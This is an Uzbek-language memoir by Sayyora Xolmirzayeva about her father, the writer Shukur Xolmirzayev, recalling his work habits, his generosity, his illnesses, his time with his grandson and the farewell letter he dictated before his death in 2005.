Payshanba, 12-noyabr, 2026 Toshkent +1° USD 11 964,27 EUR 13 323,41 RUB 144,49

“Men – adamning qiziman” – Sayyora Xolmirzayeva

Shukur Xolmirzayev – Oʻzbekiston xalq yozuvchisi. 1940 yilning 24 martida Surxondaryo viloyatining Boysun tumanidagi Shahidlar guzarida ziyoli oilada tugʻilgan. Talabalik yillaridayoq “Oq otli”, “Toʻlqinlar” nomli kitoblari chop…

Shukur Xolmirzayev – Oʻzbekiston xalq yozuvchisi. 1940 yilning 24 martida Surxondaryo viloyatining Boysun tumanidagi Shahidlar guzarida ziyoli oilada tugʻilgan. Talabalik yillaridayoq “Oq otli”, “Toʻlqinlar” nomli kitoblari chop etilgan. “Soʻnggi bekat”, “Qil koʻprik”, “Olaboʻji”, “Yoʻlovchi”, “Dinozavr” kabi romanlar, “Oʻn sakkizga kirmagan kim bor”, “Yoʻllar, yoʻldoshlar”, “Ot yili”, “Yur, togʻlarga ketamiz” kabi qissalar, “Qora kamar”, “Ziyofat” kabi dramatik asarlar, “Binafsha hidlang, amaki!”, “Odil aka haqida oʻylasam”, “Taqdir bashorati”, “Togʻlarga qor tushdi” kabi badiyalar, “Hayot abadiy”, “Oʻzbek xarakteri”, “Qadimda boʻlgan ekan”, “Bodom qishda gulladi”, “Yozuvchi”, “Tabassum”, “Bandi burgut” kabi koʻplab hikoyalar muallifi. Shukur Xolmirzayev oʻzbek milliy adabiyotida hikoyachilik maktabini yaratgan adib sifatida tan olingan. U Oybek nomidagi adabiyot mukofoti, Davlat mukofoti, “Mehnat shuhrati” ordeni, Oʻzbekiston mustaqilligining 10 yilligi nishoni bilan taqdirlangan. Shukur Xolmirzayev 2005 yilning 29 sentyabrida Toshkent shahrida vafot etgan.

Sayyora Xolmirzayeva
filologiya fanlari nomzodi, dotsent

“Men – adamning qiziman”

1
Buvimning vafotlaridan keyin bir necha yil oʻtgach, 2001 yilda ular haqida “Yurakni oʻrtovchi sogʻinch” sarlavhasi ostida maqola yozib, adamga koʻrsatgan edim. Adam oʻqib chiqqach, “Qizim, men haqimda ham keyinchalik shunaqa maqola yozasanmi” , deganlari yodimga tushdi. Shunda men, “Adajon, qoʻysangiz-chi bunaqa gaplarni” deb, mavzuni boshqa yoqqa burib yuborgan edim. Toʻgʻrisini aytsam, bu haqida u paytlar oʻylab ham koʻrmaganman, chunki men uchun adam doim yonimda suyanchigʻim, ishonganim, gʻamxoʻrim boʻlib qolaveradigandek tuyulardi. Yillar oʻtib oʻsha kunlarga sogʻinib qaytish, qaysidir darajada ularni qogʻozga tushirib xotirada tiklash, asarlarini toʻplab, chop ettirish, ijodlarini qadr topayotganini koʻrish hayotimning eng mazmunli, eng asosiy qismiga aylandi.
Togʻlarni, archalarni, soʻqmogʻ-u qirlarni, hayvonot olamini, bir soʻz bilan aytganda, tabiatni sevib, ularning bagʻrida ulgʻaygan adamning 13 yoshidan sheʼrlari, turli lavhalari, 17-18 yoshidan hikoyalari matbuotda chop etila boshlangan edi. Bolalikdan oʻta rostgoʻy, zehni oʻtkir,haqiqatparast boʻlib voyaga yetgan adam bir umr oʻz qarashlarga sodiq qolganlar. Men bolaligimdan adamni yaxshi koʻrib, hurmat qilib, ular bilan doim faxrlanib katta boʻlganman. Ular – toʻgʻrisoʻzligi, halolligi, yaqinlarga gʻamxoʻrligi, aqlliligi bilan doim menga ibrat boʻlib kelganlar.
Ular butun umr oʻz vijdonlariga qarshi ish qilmaganlar, toʻgʻri gapni tik aytganlar, xushomadni yoqtirmaganlar. Adamni, “men uchun hech qachon uyalmaysizlar”, degan gaplari boʻlardi. Ularni yaxshi bilganlar jiddiy, gʻururli, samimiy, qalbi toza inson sifatida hurmat qilishgan. Adam oʻzlari uchun hech kimdan hech qachon narsa soʻramaganlar, baʼzan bir qoʻngʻiroq bilan bitishi mumkin boʻlgan ishni ham qilmasdilar. Lekin doʻstlariga, tanish-bilishlariga, shogirdlariga qoʻllaridan kelgan yordamni ayamas edilar. Faqat ijod bobida, yozish bobida ijodkor doʻstlariga ham, shogirdlariga ham qattiqqoʻllik qilardilar, keskin lekin “achchiq haqiqat” boʻlgan beshafqat gaplarni aytishdan tap tortmasdilar. Qoʻllari ochiq, sahiy edilar, doʻstlari, qarindoshlar, shogirdlari xanuzgacha turli voqealarni, sovgʻa qilingan buyum va narsalarni xotirlaydilar. Xolbuki, adam 1981 yildan boshlab, yaʼni 41 yoshlaridan to umrining oxiriga qadar birorta davlat tashkilotida rasmiy ishlamaganlar. Yillar, oylar, kunlar davomida milliy adabiyotimizni betakror badiiy asarlar bilan boyitganlar. Nashr etilgan kitoblar, gazeta va jurnallardan tushgan qalam haqqi hisobiga kun koʻrilgan. Shunday yillar ham boʻlganki, qalam haqqi eng oddiy kundalik ehtiyojni qondirishga ham yetmasdi. Nafaqa ola boshlagan kunlaridan to umrlarining soʻnggi kunlarigacha oʻz nafaqalaridan bizlarga, oila aʼzolariga ham boʻlib berardilar. Men har gal “oʻzingizga kerak boʻladi-ku, men ishlasam, oylik olsam”, desam, “yoʻq, nabiralarimga shirinliklar olib berasan”, deb qoʻymasdilar. Ozgina u yoq- bu yoqdan tushgan qalam haqini ham ulashib chiqardilar va keyin, albatta, oʻz qoʻllari bilan osh qilib berardilar. Men uyda osh damlayotganimda, har doim ichimda “mening qoʻlim emas, adamning qoʻllari” deb pichirlab qoʻyaman. Shunda, nazarimda pishirayotgan oshim adamnikiga oʻxshaydigandek tuyulardi. Chunki men osh tayyorlashni adamdan oʻrganganman.
Adam tong chogʻi turib ishlashni yaxshi koʻrardilar. Badantarbiya qilib, achchiq qora choy yoki kofe tayyorlab, xuddi koʻchaga otlangandek kiyinib olardilar, oyoqlariga tufli kiyardilar. Keyingina ish stollariga oʻtirar edilar. Deyarli kun davomida qisqa-qisqa tanaffus qilib, ishlayverardilar, kunduz kunlari dam olib yotadigan odatlari yoʻq edi. Ularni heya qachon sport kiyimida yoki keng uy kiyimida koʻrganimni eslay olmayman. Uyga mehmon keladigan boʻlsa, galstuk taqib, eng oxorli kiyimlarini kiyib olardilar.
Bir marta menga shunday degandilar: “Juda ishlagim keldi, lekin kun yorishishini kutdim, qoʻshnilarni uyqusini buzgim kelmadi. Mashinkani ovozi ularga eshitiladi. “Yozuvchi kechasi uxlatmadi”, deyishmasin-da”.
Televizorda siyosiy va adabiy koʻrsatuvlardan tashqari tabiat va hayvonot dunyosi bilan bogʻliq koʻrsatuvlarni koʻrishni yaxshi koʻrardilar. Moskvadan olib beriladigan “Hayvonot olamida” koʻrastuvini oʻtkazib yubormasdilar va bizlarni ham koʻrishimizni istardilar.
Maktab paytlarimda adam ish stollarida mashinkalarini chiqillatib ishlayotganlarida koʻngillari toʻlmagan yoki tahrirtalab boʻlgan qogʻozlarni stolning chetiga tashlar edilar va oʻsha betlarni boshqatdan yozardilar. Men hali juda yosh edim, u yozilgan qogʻoz varaqlarni olib qoʻyish kerakligiga aqlim yetmasdi. Qogʻoz uyum-uyum boʻlib ketardi, ular hozir saqlanmagan. Qoʻllarida oxirgi nusxasi qolardi. Agar bitta-yarimta xato soʻz oʻtib ketgan boʻlsa, sekin piskada oʻchirib, qora ruchkada ustidan yurgizib toʻgʻirlab qoʻyardilar. Uyum-uyum toʻplanib yotgan qogʻozlarning ichida baʼzan butun-butun asarlar ham, oxirgi nusxasigacha tashlanganini va natijada matbuot yuzini koʻrmay ketgan asarlar ham boʻlganini keyinchalik bildim.

2
1972 yilning yozida adam men(10 yoshda) bilan ukamni(7 yoshda) yozgi taʼtilda Surxandaryoga bir oʻzlari olib borgan edilar. Opamni ish joylaridan(Oʻzbekiston teleradio kompaniyasidan) Hindistonga malaka oshirishga yuborishgan edi. U paytlar adamni hali mashinlari yoʻq edi. Boysunga bir necha kun ichida yetib borganmiz. Katta hovli qarindosh-urugʻlarga toʻla edi. Adamning akalari Inoyatilla aka Zamira yanga bilan, singillari Barno opa, ukalari Neʼmat akalar Sanobar yanga bilan, ularning farzandlari oʻsha yerda ekanlar. Bizlarni momom, bobom, barcha qarindosh-urugʻlarimiz xursandlik bilan kutib olishgan. Momomning barcha nevaralari har kuni qoʻl ushlashib bozorga yoʻl olardik. Momom Boysun bozoriga raislik qilardilar, toʻgʻri ularning ishxonalariga kirib borardik. Ular bozorni aylantirib, biz yoqtirgan, xohlagan narsalarimizni olib berardilar. Tushdan keyin esa, adam doʻstlari bilan meni, ukamni, yana birorta jiyanlarini mashinaga oʻtkazib atroflarni aylantirar, tomosha qildirar edilar, mehmondorchiliklarga olib borardilar. Toshkentga kelishimizdan oldin esa adam Boysundagi doʻkonlarga kirib, bizlar uchun mos keladigan kiyim-kechaklarni xarid qilardilar. Toshkentdagi buvimga, Hindistondagi opamga ham sovgʻa-salomlar olingan edi.
Men yuqorida opam Hindistonga malaka oshirishga ketgan edilar, deb yozgan edim. Hozir shu haqida ham bir oz toʻxtalib oʻtmoqchiman. Opam 40 yildan ortiq Oʻzbekiston teleradio kompaniyasining Chet elga eshittirish tayyorlaydigan boʻlimida hind tilidan tarjimon va diktor boʻlib ishlaganlar. Oʻsha boʻlimning ochilishida tamal toshini qoʻyganlardan, oʻz sohasining yetakchi mutaxassisi-hindshunosi sifatida qadrlanib kelganlar. 1972 yilda xuddi shu boʻlimga radio tarixida birinchi marta Hindistonda malaka oshirish boʻyicha bitta oʻrin beriladi. U paytlarda chet ellarga malaka oshirish uchun yuborilmas edi. Tashkilotning oʻzi ham Moskvaga boʻysunganligi sababli, bitta oʻrin ham Moskvadan yuborilgan. Jamoa va rahbariyat Hindistonga, oʻn oyga malaka oshirishga yuborish uchun opamning nomzodlarini loyiq deb topishgan. Bu holatni adam, opam, buvim birga oʻtirib, maslahat qilishgan. Shunda adam bunday imkoniyat kamdan-kam boʻlishini, opam uchun bu oʻqish oʻz sohasi boʻyicha kelajakda muhimligini tushunib, ularning xohishlariga qarshilik koʻrsatmaganlar. Ha, adam kutilayotgan ogʻirliklarni, masʼuliyatni oʻz yelkalariga olib, qiyin boʻlishini bila turib, opamning oʻn oyga ketishlariga rozilik bildirganlar. Shunday qilib, opamni Toshkent aeroportidan Moskvaga adam, buvim, Botir aka(Zokirov), Abdulla aka(Oripov), Uchqun akalar(Nazarov) kuzatib qoʻyishgan. Soʻng opam Moskva aeroportidan Hindistonga uchib ketganlar. Oʻn oy davomida opamdan uzogʻi bilan oʻn kun ichida xatlar kelardi. Bitta xat adamning nomlariga, yana bittasi buvimning nomlariga. Buvimning nomlariga yozilgan xatlarni ular men bilan ukamga oʻqib berardilar. Adam bilan opamning oʻrtalaridagi yozishmalarni 3-4 tasi saqlanib qolgan. Xatlarning mazmunidan koʻrinadiki, adam konvert ichiga yozgan hikoyalaridan nusxalar ham solib yuborgan ekan. Javob xatida opam asar haqida oʻz fikrlarini bildirganlar hamda oʻzlariga maʼqul boʻlgan hind yozuvchilarining hikoyalar haqida fikr bildirganlar.
Shunday qilib, uyda adam, men va ukam oʻzimiz yashay boshladik. Adam meni va ukamni maktabga kuzatib qoʻyardilar, birga dars tayyorlardik, olgan “5” baholarimiz bilan ularni xursand qilardik. Koʻpincha, kechki ovqatni uyimizning yonidagi “Lazzat” kafesida qilardik. Baʼzan adam oʻsha kafedan tayyor ovqatlarni olib kelardilar. Buvim u paytlar hali ishlar edilar, Shayhontoxur tumanidagi ZAGS boʻlimini boshqarardilar. Shuning uchun ular yakshanba kunlari ertalab kelib, kiyim-kechaklarimizni tartibga solardilar, uy ishlarida yordam berardilar, baʼzan men va ukamni oʻzlarinikiga – eski shahardagi hovlilariga olib ketardilar. Qoʻshnilarimiz Hanifa opa(A. Oripovning rafiqasi), Chaman opa(D. Nuriyning rafiqasi), Roʻza opa(O. Muxtorning rafiqasi) doim mendan hol-axvol soʻrab turishardi. Xuddi shu yili adamning “Kulgan bilan kuldirgan”, “Oʻzbekning soddasi”, “Biz kech qolib yuramiz”, “Ora yoʻl”, “Tikan orasidagi odam” kabi hikoyalari gazeta va jurnallarda chop etilgan edi. Hozir oʻylab qarasam, adaginam bir paytning oʻzida ijod qilishga ham, farzandlariga tarbiya berishga ham, ishga borib kelishga ham ulgurgan ekanlar-a.
1971-1975 yillar davomida adam Muqimiy nomli musiqa drama teatrida adabiy emakdosh boʻlib ishlaganlar. Mening sinf rahbarim Mavjuda opa adamdan taʼtil paytlari bolalarga atab qoʻyilgan spektakllarga biletlar olib berishlarini iltimos qilardi. Adam har gal bu iltimoslarni bajarardilar.

3
Adam bilan opam doim shahar teatrlarida qoʻyilayotgan yangi sahna asarlarining premerasiga borib turishardi. Opam xonanda Alla Pugacheva Toshkentga gastrol bilan kelganida, uning kontsertiga tushishga adamni koʻndirgan ekanlar. Kontsert adamga maʼqul kelgan, “Bu qoʻshiqchining kelajagi bor, hali mashhur boʻlib ketadi”, degan ekanlar. Beixtiyor adam doʻstlari Botir Zokirovning qoʻshiqlarini sevib tinglashlarini esladim.
Umuman adamni har sohadan doʻstlari koʻp edi. Rassomlar, aktyorlar, rejissyorlar, qoʻshiqchilar, baxshilar – qisqasi sanʼatning barcha koʻrinishlari ular uchun qadrdon, muhim, yaqin edi. Uyimizda qanchadan-qancha ertalabgacha qizgʻin gurunglar boʻlgan, qoʻshiqlar kuylangan, doʻmbira chertilgan. Soʻnggi yillardagi koʻngiltortar yaqinlaridan rassom Roʻzi Choriyev, rejissyorlar Rahmat Jumayev, Bahodir Yoʻldoshev, olim Bahodir Sarimsoqov, tarjimon Nizom Komilovlar bilan tonggacha davom etgan suhbatlarning oʻzim guvohi boʻlganman. Doʻstlar uchun eshiklari doim ochiq edi. Ish stollarining yonidagi kichik stolchaning turli meva-chevalar bilan yasatilganligi adamga yoqar edi. Faqat ishlayotganlarida, yaʼni yozib oʻtirganlarida birov halaqit berishini, vaqtlarini olishini istamasdilar.
Koʻp yozuvchi va shoirlar bir nechtalab chet mamlakatlariga borganlarini faxr bilan ketma-ket sanaydilar. Adam chet ellarda deyarli boʻlmaganlar, faqat opamning qistovlari bilan turistik yoʻllanma bilan bir necha kunga Chexoslovakiyaga borishgan. Ularning “chet ellari” ham Boysun, u yerning odamlari edi. Adam butun umr Boysunga talpinib yashadilar. Ular uchun Xorazm, Buxoro, Samarqand, Fargʻona kabi yurtlarga oila aʼzolarini olib borish, sayohat qildirish, doʻstlar bilan diydorlashuv, yangi-yangi odamlar bilan tanishuv har qanday chet eldan qadrliroq kutilgan lahzalar edi. Menimcha, oʻzlari kezmagan chet el mamlakatlarda endi ular yozib qoldirgan asarlarning sayohat qilish vaqti keldi. Endi ular adamni oʻzbek millatining oʻzligini, uni feʼl-atvorini ochib bergan badiiy durdonalari orqali tanishsa ajab emas.
Adamni bir necha kunlab yoki ikki-uch haftalab sanatoriylarda turli muolajalarga qatnab, dam olib yotishlarini tasavvur qila olmayman. Balki shu narsalar amalga oshganida, adam koʻproq umr koʻrgan boʻlarmidilar…Ular qayerlargadir bir-ikki oyga boradigan boʻlsalar ham(masalan Qoʻrgʻonchi, Uchqizil), yozayotgan asarlarini tugallab kelish uchun, ishlagani borar edilar. Kasalxonada davolanishni esa mutlaqo istamasdilar, eng oxirgi daqiqadagina, boshqa hech qanday iloji qolmagandagina yotishga rozi boʻlardilar.

4
2001 yilning 20 avgust kuni. Oʻgʻillarim bilan adamdan xabar olgani dacha- bogʻlariga borsak, bir kun avval choy damlayotganlarida choynakdagi qaynoq suv chap oyoqlarining topigʻiga toʻkilib, oyoqlarini kuydirib qoʻygan ekanlar. Toʻgʻrisi, dacha-bogʻda yashash uchun sharoit deyarli yoʻq edi, bir amallab moslashgan edilar. Lekin har yili kech kuzgacha oʻsha yerda qolib ketardilar. Shahardagi uylariga faqat izgʻirin sovuq tushgandan keyingina qaytar edilar, ertaroq shaharga koʻchishga hech ham rozi boʻlmasdilar. Adamdan boʻlgan voqea haqida surishtirib turgan edim, darvoza yonidan mashinada oʻtib ketayotgan Dadaxon aka(Nuriy) bizlarni koʻrgach, toʻxtab, soʻrashgani hovliga kirdilar. Dadaxon aka shahardagi uyimizda ming yillik bir devor qoʻshnimiz boʻlganlar. Adamning chap oyoqlarining toʻpigʻi shilinib tushgan, jarohat ogʻriq berayotgani sezilib turardi. Biz Dadaxon aka bilan ikkimiz shu yaqindagi sanatoriyning vrachiga koʻrsatishga adamni koʻndirdik. Mashinaga oʻtkazib, olib bordik. Vrach ogʻriqsizlantiruvchi dori qoʻyib, yarani bogʻladi va albatta, kasalxonaga borishlari kerakligini tayinladi. Dachaga qaytib kelgach, adam kasalxonaga olib borishimizga hech ham unamadilar. “Yoʻq, bormayman, oʻtib ketadi, ishlarim koʻp,”-deb turib oldilar. Men koʻnglim gʻash boʻlib, bolalar bilan uyga qaytib keldim. Lekin tinchimni yoʻqotgan edim. Bir kunni oʻtkazib, ishdan ertaroq chiqdim-da, dachaga qarab yoʻl oldim. Adam hovlidagi supada oyoqlarini osiltirib oʻtirgan ekanlar, kayfiyatlari yoʻq, koʻrinishlari ham yaxshimas, doim kelganimda yonimga peshvoz boʻlib chiqadigan adamni bu holda koʻrib, hafa boʻlib ketdim. Chap oyoqlarining past qismi shishib ketgan, jarohat ogʻriq berayotganidan, qiyinchilik bilan bosiladigan holga kelgan, buning ustiga infektsiya tushgan shekilli, isitma ham berayotgan ekan. “Ada, men hozir mashina olib kelaman, koʻchaga chiqib. Menikiga ketamiz”,- dedim keskin ohangda. Adam bir ogʻiz ham qarshilik koʻrsatmadilar, ixtiyorlarini toʻliq menga topshirdilar. Mashinaga oʻtirib, 9- qavatdagi uyimga yetib keldik. Bir amallab yuvinib chiqdilar, keyin ovqatlandik. Oyoqlarini choʻzib, xontaxta yonida bir oz dam oldilar. Sevimli kofelaridan ichdilar. Keyin men uyga “Tez yordam” xizmatini chaqirdim. Yarim soat oʻtar-oʻtmas “Tez yordam” yetib keldi. Oʻrta yoshlardagi vrach ayol adamning ahvollarini koʻrib, zudlik bilan kasalxonaga olib ketishini, gospitalizatsiya qilishini aytdi. “Oyoq kuygan kuniyoq yarani davolash kerak edi. Aks holda yomon asoratlarga olib kelishi mumkin-ku”,- dedi kuyinib.
Shunday qilib, 2001 yilning 22 avgust kuni bizlarni “Tez yordam” mashinasida Chorsudagi birinchi shahar kasalxonasiga olib ketishdi. Adam kasalxonada sakkiz kun yotdilar, lekin u yerda yotganlarini deyarli hech kimga aytmadik, ular shuni xohladilar. Adamdan xabar olgani har kuni oʻzim borib turdim. Sakkizinchi kuni adamni u yerdan sogʻ-salomatlikda olib chiqib ketdim. Yuqorida aytganimdek, dacha-bogʻda sharoit yoʻqligi sababli ozodalikka toʻliq rioya qilish imkoniyati yoʻq edi. 2004 yilning 28 iyul kun ham adam oʻzlarini yomon his qilgan edilar. Qorinlarida kuchli ogʻriq boshlanib, ularni holsiz qilib qoʻygan edi. Shunda kasallik sababini aniqlashtirish va davo topish uchun davlat poliklinikasiga borgan edik. Tekshiruv natijalaridan keyin vrach adamni oʻsha zahotiyoq infektsion kasalxonaga yotishlari kerakligini, hoziroq mashinada oʻzlari olib borishlarini aytgan edilar. Adam esa: “Men infektsion kasalxonaga bormayman”,- deb turib olgandilar. Menga qarab: “Meni uyinga olib ketgin, qizim. Oʻsha kasalxonaga yotqizmagin. U yerga koʻrgani kelganingda, seni ham kiritishmaydi. U shunday joy”,-dedilar. Xullas, vrachlar eʼtiroziga qaramay, biz uyda davolanadigan boʻldik. Bitta xonani adam uchun “palata” qilgandik, vaqtincha bolalarni ham kiritmay turdik. Poliklinikadan meditsina xodimlari kelib osma ukol, ukol qilishar, parhezga rioya qilayotganlarini nazorat qilishar, qisqasi, muolajalar xuddi kasalxonadagidek boʻlgandi. Uyda yosh bolalar boriligini bilib, ularga yuqmasligi uchun poliklinikadan kelib, uyni dezinfektsiya qilib ham ketishgan edi. Adam butunlay tuzalib ketganlaridan keyingina yana dacha-bogʻlariga qaytib borgan edilar.

5
Adam nafaqat mehribon ota, balki farzandlarimning mehribon “Shukur buva”si ham edilar. Farzandlarimni dacha-bogʻlariga olib boramanmi, yoki shahardagi uylarigami “polvonlarim keldi”, deb xursand boʻlib ketar edilar.Ulardan oʻqishlari, oʻqiyotgan kitoblari, doʻstlari haqida soʻrab surishtirardilar, soʻnggida esa “opangni gapiga kirib yuringlar”, deb tayinlardilar.
Xotirani jonlantirar ekanman, koʻz oldimga oʻgʻlim Qahramonning qop-qora choynakni koʻtarib turgan holati keldi. Ishton-koʻylagining oldilariga ham qora tekkan, lekin oʻzi xursand, kulib turibdi. 2002 yil edi, avgust oyining boshlarida dacha-bogʻlariga borganimda doimgidek adam bilan ancha gurunglashib oʻtirdik. Shunda adam: “Qizim, Qahramon hozir taʼtilda. Bir necha kun men bilan shu yerda yashashiga ruxsat bergin”, deb qoldilar. Toʻgʻrisi, avvaliga nima deyishni bilmay qoldim. Qahramon oʻzi 9 yoshlarda, shu paytgacha uydan tashqari hech qayerda yotib qolmagan, toʻqqizinchi qavatda katta boʻlayotgan bolacha edi. “Yoʻq” desam, dillarini ogʻritib qoʻyishim mumkin edi. Shunda men: “Ada, shu paytgacha Qahramon biror kun ham oiladan uzoqlashmagan. Buning ustiga, bu yerda sharoit ogʻirroq, qiynalib qolishinglar mumkin. Ishingizdan ham chalgʻitishi mumkin. Har holda yosh bola, injiqliklari ham boʻlishi, ehtimol”, -degan edim. Adam: “Qizim, yakshanba kuni nevaramni olib kelib, bir haftaga men bilan qoldirib ketasan. Bilaman, xavotir olyapsan. Senga har kuni kechqurun soat 7-8 larda, Yozuvchilar bogʻiga borib, oʻsha yerdan qoʻngʻiroq qilamiz. Bilasan, u yerda shahar telefoni bor. Senga hisobot berib turamiz”, -dedilar. Shunday qilib, yakshanba kuni Qahramon kiyim-kechaklari, baʼzi oʻyinchoqlari, qogʻoz-qalamlari solingan sumkachasini koʻtarib, dacha-bogʻga kirib keldi. U dacha-bogʻda bir hafta buvasi bilan yashashini eshitgach quvonib ketgan, hatto unga ergashgan ukasi Javlonbekka: “Sen oyijon bilan qolgin. Kattaroq boʻlsang, sen ham borasan. Telefonda gaplashib turamiz”, – degan edi katta bolalardek. Shunda birinchi marta oʻgʻlim ulgʻayayotganini sezdim va qalbim quvonchga toʻldi. Vaʼdaga koʻra, ular har kuni kechqurun qoʻngʻiroq qilishdi, adam bilan ham, Qahramon bilan ham gaplashib turdim. Yakshanba kuni ham yetib keldi. Ertalab TTZ bozoriga kirib, kerakli narsalarni xarid qildim, keyin dacha-bogʻ tomon yoʻl oldim. Hovliga yaqinlashgach, shundoqqina koʻchada 3-4 ta bolalarni velosiped uchib yurganlarini koʻrdim. Ularning ichida Qahramon ham bor edi. Mahallaning oʻzbek, qozoq bolalari bilan xuddi butun umr shu qishloqda yashayotgandek doʻstlashib ketishibdi. Meni koʻrib, velosipeddan tushib, yonimga yugurib keldi, salomlashdi, qoʻlimdagi sumkalarni olib, buvasini chaqirib, hovliga kirib ketdi. Kichkina xonada ishlab oʻtirgan adam Qahramonning ovozini eshitgach, chiqib keldilar:”Ey, polvonimni onasi kelibdi-da”, – dedilar, soʻrashdik. Supaga joy tayyorladik. Shunda Qahramon: “Hozir choy olib kelaman”, desa boʻladimi. Men hayron boʻlib adamga qaradim, ular kulib qoʻydilar. Bir oz vaqt oʻtgach, hikoyamning boshidagi holatga koʻzim tushdi. Gʻishtdan yasalgan oʻchoqda choynakda suv qaynatib olib kelibdi. Keyin choy damladik. Borib oʻchoqni tomosha qilgandim. Qahramon esa oʻchoqda ovqat qilishni ham Shukur buvasidan oʻrgangani haqida gapirib ketdi. Shunday qilib, oʻchoqda oshni ham adam, men, Qahramon birga pishirdik. Kechga yaqin uyga otlana boshladik. Qarasam, eshikning tagida oʻrtoqlari qarab turishibdi, ular bilan xayrlashdi, yana kelishini aytdi. Buvasi bilan birga yashash yaxshiligini, yana qolish istagi borligini aytganida, keyinroq yana albatta bir necha kunga kelishini aytdim. Bu qaysidir maʼnoda, Qahramonning hayotdagi ilk mustaqil kunlari boʻlganini his qildim. Adam oʻzlari bilib-bilmay Qahramonni birinchi marta erkinlikka, hayotga oʻrgatdilar.
Adam, suhbatlarimizning birida shunday degan edilar: “Qizim, Qahramon kattaroq yigit boʻlganida, men bilan birga yashasin.”. Shunda men adamni xursand qilib, shunday degan edim: “Xoʻp boʻladi, adajon. Sizga ham qarab yuradi, ham barcha ishlaringizda yordamchingiz boʻladi. Ish yuzasidan koʻchaga chiqqaningizda, sizga suyanchiq boʻladi”. Adamning chehralari yorishib: “Rahmat qizim, ishqilib, Olloh umr berib, shu kunlarga yetkazsin”- degandilar.
Shunda beixtiyor Qahramonni buvasi bilan birga yashaganida har kuni kechqurun oʻzlari unga joy solib berganlarini, uyqudan oldin esa erkalovchi gaplar bilan unga mehribonchilik qilganliklarini aytib bergani esimga tushdi.

6
Adam doim oʻzaro suhbatlarida umrlarining soʻnggi damlariga qadar yozish imkoniyati tark etmasligini niyat qilardilar. Xuddi shunday boʻldi ham(oʻzlari aytganlaridek “yozishdan qolganalari yoʻq”). Chunki adam uchun ijod qilmasdan umr kechirish maʼnisizdek tuyulardi. Bu yorugʻ dunyoda yashashdan, nafas olishdan maqsad oʻy-fikrlarini bus-butun egallagan asarlarini tugatish boʻlardi. Stollarida 4-5 ta boshlangan hikoyalari hamda ularning variantlari chala qolib ketdi.
2005 yilning 20 iyul kuni. Adam ancha tetik edilar. Lekin 4-5 kun avval ayrim ogʻriqlar toʻxtovsiz bezovta qilganligi sababli vrach va hamshirani chaqirgan edik, dori-darmonlarni oʻz vaqtida ichish kabi bir qancha koʻrsatmalarni berib ketishgan, ularning nazorati ostida edilar. Ertalab turib, nonushta qildik, keyin sekin ishga otlana boshladim. Buni koʻrgan adam: “Qizim, soat nechchilarda ishdan qaytasan?”-deb soʻrab qoldilar. Men uzogʻi bilan 3-4 soatda qaytib kelishimni aytib, “biror ishingiz bormidi, adajon?”- deb soʻradim. Shunda adam: “Ikki-uch betlik narsani aytib turib yozdirmoqchi edim”,-dedilar. Men esa, “Ada, xohlasangiz men kelganimdan keyin yozamiz, ungacha dam olib turarsiz. Agar hozir yozdirmoqchi boʻlsangiz, mana – Qahramon, sizga qarab turishini tayinlagandim, – hamma aytgan gaplaringizni qogʻozga tushiradi, oʻzi xatosiz yozadi”,- dedim. Shundan keyin ishga ketdim. Ishda birov koʻrindimda, kerakli narsalarni xarid qilish uchun avval doʻkonga keyin dorixonaga oʻtdim. Uyga kirib kelishim bilan, adam: “Ana, bolam, vaqtida yozib boʻlibmiz, Opang ham darrov yetib qoldi”, – dedilar Qahramonga qarab. Men oshxonaga oʻtayotgan edim, adam: “Qizim, choy keyin…Hozir sen menga ovoz chiqarib yozgan narsalarimizni oʻqib bergin”, -dedilar va kresloga bemalol suyanib oʻtirdilar. Men stulni ularga yaqinlashtirib surib, stolda yoyilib yotgan, katta-katta harflar blan yozilgan bir nechta qogʻoz varaqlarini qoʻlimga olib, koʻz yugurtira boshladim. “Ena qizim Sayyorajon” degan sarlavhaga koʻzim tushdi. Toʻgʻrisi, nima haqida yozilganligidan xabarim yoʻq edi. Matnni oʻqiy boshladim. Lekin bir oz oʻqigach, chiday olmadim, tomogʻimga nimadir tiqildi, koʻzimga kelayotgan yoshni toʻxtata olmadim. Aytgan gapim shu boʻldi: “Ada-aa, nimaga bunaqa gaplarni yozdirdingiz? Hali hammasi yaxshi boʻladi, tuzalib ketasiz-ku”. Shunda adam: “Qizim, shu nomda esse yozishni oʻylab qoʻygan edim, senga bagʻishlab. Lekin sogʻligʻim borgan sari yomonlashyapti. Esse yozishga ulgurmayman, shekilli. Shuning uchun senga shu maktubni yozib qoldiryapman. Qizim, bilasanmi, esseni qanday boshlanishini va yakun topishini ham oʻylab qoʻygan edim. Seni birinchi marta Boysunga olib borishimizdan boshlamoqchi edim. Unda hali men ham, opang ham talaba edik, 1,5-2 yoshlarda eding. Termiz shahrigacha poyezdda borib, keyin Boysunga mashinada ketilar edi. Seni koʻtarib, poyezd vagonidagi oynadan tomosha kildiryapman. Shunda poyezd keng yaylovzordan oʻtayotganda, sigir va qoʻylarni oʻtlab yurganini koʻrib, sen qoʻling bilan koʻrsatib “mo-mo” deb baqirgan eding. Mana shu voqeadan esseni boshlamoqchi edim”.
Men esa sekin oshxonaga oʻtdim, koʻnglim buzilib, koʻz yoshlarimni sezdirmaslikka harakat qildim.
2005 yilning 29 sentyabrida, oradan ikki oy-u toʻqqiz kun oʻtgach, adam bu olamdan koʻz yumdilar. Keyinchalik bu maktubni adamning soʻnggi istaklariga koʻra, “Saylanma”larining 3 jildiga kiritdim.
Nazarimda, adajonim bu maktubni hayotim davomida menga madad boʻlishi uchun, mehrni tuyib yurishim uchun, hech qachon oʻzimni yolgʻiz his qilmasligim uchun, yiqilsam, turishimga yordam berishi uchun, oʻzimni qiyinchiliklar oldida yoʻqotib qoʻymasligim uchun, kimni farzandi ekanligimdan faxr tuygʻusini his qilib yashashim uchun ham menga hamroh qilib yozib qoldirganlar…
2018 yil.

